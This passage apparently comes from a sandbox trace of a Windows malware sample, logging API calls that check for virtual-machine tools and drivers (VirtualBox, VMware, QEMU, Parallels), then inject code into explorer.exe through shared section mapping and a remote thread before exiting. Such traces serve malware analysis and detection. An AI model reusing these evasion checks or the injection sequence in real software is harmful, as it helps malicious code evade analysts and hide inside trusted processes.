_SubStr="vboxservice.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="qga.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="windanr.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.339] wcsstr (_Str="state.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="qga.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="windanr.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.340] wcsstr (_Str="four.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="qga.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="windanr.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.340] wcsstr (_Str="treatmentabout.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="qga.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="windanr.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.340] wcsstr (_Str="treat.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.340] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.340] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="qga.exe") returned 0x0 [0079.340] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="windanr.exe") returned 0x0 [0079.340] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.341] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.341] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.341] wcsstr (_Str="quickly_mention_learn.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="qga.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="windanr.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.341] wcsstr (_Str="offer_shot.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.341] wcsstr (_Str="total.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.341] wcsstr (_Str="total.exe", _SubStr="qga.exe") returned 0x0 [0079.341] wcsstr (_Str="total.exe", _SubStr="windanr.exe") returned 0x0 [0079.341] wcsstr (_Str="total.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.343] LocalFree (hMem=0x414aa8) returned 0x0 [0079.343] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0079.344] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x414aa8 [0079.344] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x414aa8, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x414aa8, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0079.345] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0079.345] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0079.345] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0079.346] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0079.346] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0079.347] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0079.348] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0079.348] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0079.349] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0079.349] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0079.349] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0079.349] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0079.349] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0079.349] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0079.349] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0079.349] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0079.349] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0079.350] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0079.350] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0079.351] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0079.351] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0079.351] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0079.351] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0079.351] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0079.351] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0079.352] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0079.352] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0079.353] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0079.353] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0079.354] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0079.354] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0079.355] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0079.355] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0079.355] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0079.355] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0079.355] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0079.356] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0079.356] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0079.357] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0079.357] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0079.357] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0079.357] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0079.358] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0079.358] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0079.359] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0079.359] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0079.359] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0079.362] LocalFree (hMem=0x414aa8) returned 0x0 [0079.362] Sleep (dwMilliseconds=0x1388) [0084.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x210000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0084.376] GetShellWindow () returned 0x100e6 [0084.376] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0084.377] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0084.377] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0084.377] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0084.377] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x220000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0084.377] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x27a0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0087.677] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x220000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe")) returned 0x45 [0087.678] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0087.678] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x230000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0087.678] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x36c0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0087.683] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x36c1930, Parameter=0x27a0000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0087.685] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x8651000" os_pid = "0x390" os_integrity_level = "0x2000" os_privileges 